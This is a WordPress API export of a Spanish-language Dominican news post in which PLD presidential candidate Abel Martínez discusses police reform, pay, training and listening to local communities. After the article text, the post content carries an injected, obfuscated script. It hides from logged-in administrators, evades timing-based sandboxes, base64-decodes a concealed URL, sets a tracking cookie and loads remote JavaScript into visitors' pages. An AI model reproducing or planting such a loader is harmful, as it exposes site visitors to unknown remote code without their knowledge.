{"id":14203,"date":"2023-02-19T14:58:13","date_gmt":"2023-02-19T18:58:13","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14203"},"modified":"2023-02-19T14:58:13","modified_gmt":"2023-02-19T18:58:13","slug":"abel-martinez-sobre-reforma-pn-no-solo-es-hablar-de-buenos-sueldos","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14203","title":{"rendered":"Abel Mart\u00ednez sobre reforma PN: no solo es hablar de buenos sueldos"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/politica\/abel-martinez-sobre-reforma-pn-no-solo-es-hablar-de-buenos-sueldos\/\" data-title=\"Abel Mart\u00ednez sobre reforma PN: no solo es hablar de buenos sueldos\" data-description=\"Abel Mart\u00ednez, candidato presidencial del Partido de la Liberaci\u00f3n Dominicana (PLD), dijo que el mismo debe ser parte de un plan integral\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-b490c180-75a1-4ad0-afc3-3aa51eeee173\">\n<div class=\"at-share-btn-elements\">Al ser cuestionado sobre su opini\u00f3n en torno a la necesidad de un plan de viviendas para los agentes de la Polic\u00eda Nacional, <strong>Abel Mart\u00ednez<\/strong>, candidato presidencial del Partido de la Liberaci\u00f3n Dominicana (PLD), dijo que el mismo debe ser parte de un plan integral de desarrollo, de tecnificaci\u00f3n del cuerpo del orden.<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<p>\u201cNo solo es hablar de buenos sueldos, tenemos que hablar de prepararlos bien, que se les garantice la salud de cada miembro y de sus familiares, pero, adem\u00e1s, hay que garantizar que a la hora de retirarse luego de una entrega en cuerpo y alma a servicio de la sociedad, puedan vivir dignamente\u201d, se\u00f1al\u00f3.<\/p>\n<p>Agreg\u00f3 adem\u00e1s, que una necesaria Reforma Policial, debe estar dirigido adem\u00e1s, a la tecnificaci\u00f3n y preparaci\u00f3n para combatir la delincuencia, pero tambi\u00e9n se deben dirigir esfuerzos efectivos en materia de prevenci\u00f3n del delito.<\/p>\n<p>\u201cDe la capacitaci\u00f3n de los agentes del orden depende mucho el combate a la criminalidad y la efectividad en la prevenci\u00f3n. Como sociedad debemos aspirar a crear los mecanismos adecuados para que cr\u00edmenes y delitos no enluten nuestras familias y podemos lograrlo, pero tenemos que dirigir los esfuerzos enfocados en las peculiaridades de cada provincia, municipio o barrio, porque no es lo mismo enfrentar la delincuencia en una zona de trasiego de drogas, que en una comunidad en Santiago; no es el mismo plan que se debe aplicar en Hato Mayor, en Capotillo, en Cristo Rey, en Katanga, o aqu\u00ed en Madre Vieja, cada zona\u00a0 requiere una planificaci\u00f3n diferente para que sea efectiva\u201d, asegur\u00f3.<\/p>\n<p>Mart\u00ednez ofreci\u00f3 estas declaraciones al realizar un recorrido por municipios de la provincia San Crist\u00f3bal, enmarcado en su inter\u00e9s de escuchar las inquietudes y necesidades de las comunidades de cada localidad del pa\u00eds.<\/p>\n<p>Al sostener un encuentro con representantes de medios de comunicaci\u00f3n en esta provincia, Abel explic\u00f3 el prop\u00f3sito y la motivaci\u00f3n de los encuentros que \u00e9l encabeza cada fin de semana, mientras al mismo tiempo, la dirigencia del PLD se moviliza en todo el territorio nacional.<\/p>\n<p>\u201cLo que estamos haciendo en esta provincia es escuchar cu\u00e1les son las inquietudes, porque no es hacer un programa de gobierno en una oficina con aire acondicionado y con t\u00e9cnicos tra\u00eddos de Harvard; los t\u00e9cnicos el PLD los tiene, los mejores\u201d destac\u00f3 Mart\u00ednez, asegurando que la esencia de un verdadero plan integrado de gobierno debe estar sustentada en base a las necesidades y particularidades de cada localidad.<\/p>\n<p>Mart\u00ednez indic\u00f3 que cada acci\u00f3n de un gobierno debe ir acorde a los deseos y necesidades reales de los distintos sectores, escuchando desde los constructores, agricultores, los abogados, m\u00e9dicos, amas de casas, hasta los motoconchistas y chiriperos.<\/p>\n<p>\u201cLas obras que necesitan en Hatillo no son las mismas que se necesitan en Hato Damas; lo que se necesita en el municipio cabecera de San Crist\u00f3bal no es lo mismo que necesita Bonao y por eso queremos partir de esas necesidades y que juntos hagamos un programa de gobierno desde el coraz\u00f3n de la gente para ejecutarlo, no como el programa de gobierno actual que no hay una sola obra de las que prometieron que se haya hecho porque nos enga\u00f1aron con un buen libro, un buen discurso y un fatal gobierno\u201d, expres\u00f3.<\/p>\n<p>El candidato presidencial destac\u00f3 la importancia que tiene escuchar a la juventud que, a su juicio, se siente abandonada, \u201cno tienen oportunidades, tienen el deseo, el empuje de echar para adelante, emprendedores que quieren que sus negocios crezcan, pero no tienen alternativas y eso es que vamos a garantizar: oportunidades para trabajar, desde el coraz\u00f3n de la gente, apoyarlos en la conquista de lo que anhelan y quieren\u201d.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Al ser cuestionado sobre su opini\u00f3n en torno a la necesidad de un plan de viviendas para los agentes de la Polic\u00eda Nacional, Abel Mart\u00ednez, candidato presidencial del Partido de la Liberaci\u00f3n Dominicana (PLD), dijo que el mismo debe ser parte de un plan integral de desarrollo, de tecnificaci\u00f3n del cuerpo del orden. \u201cNo solo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14206,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14203","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14203"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14203\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}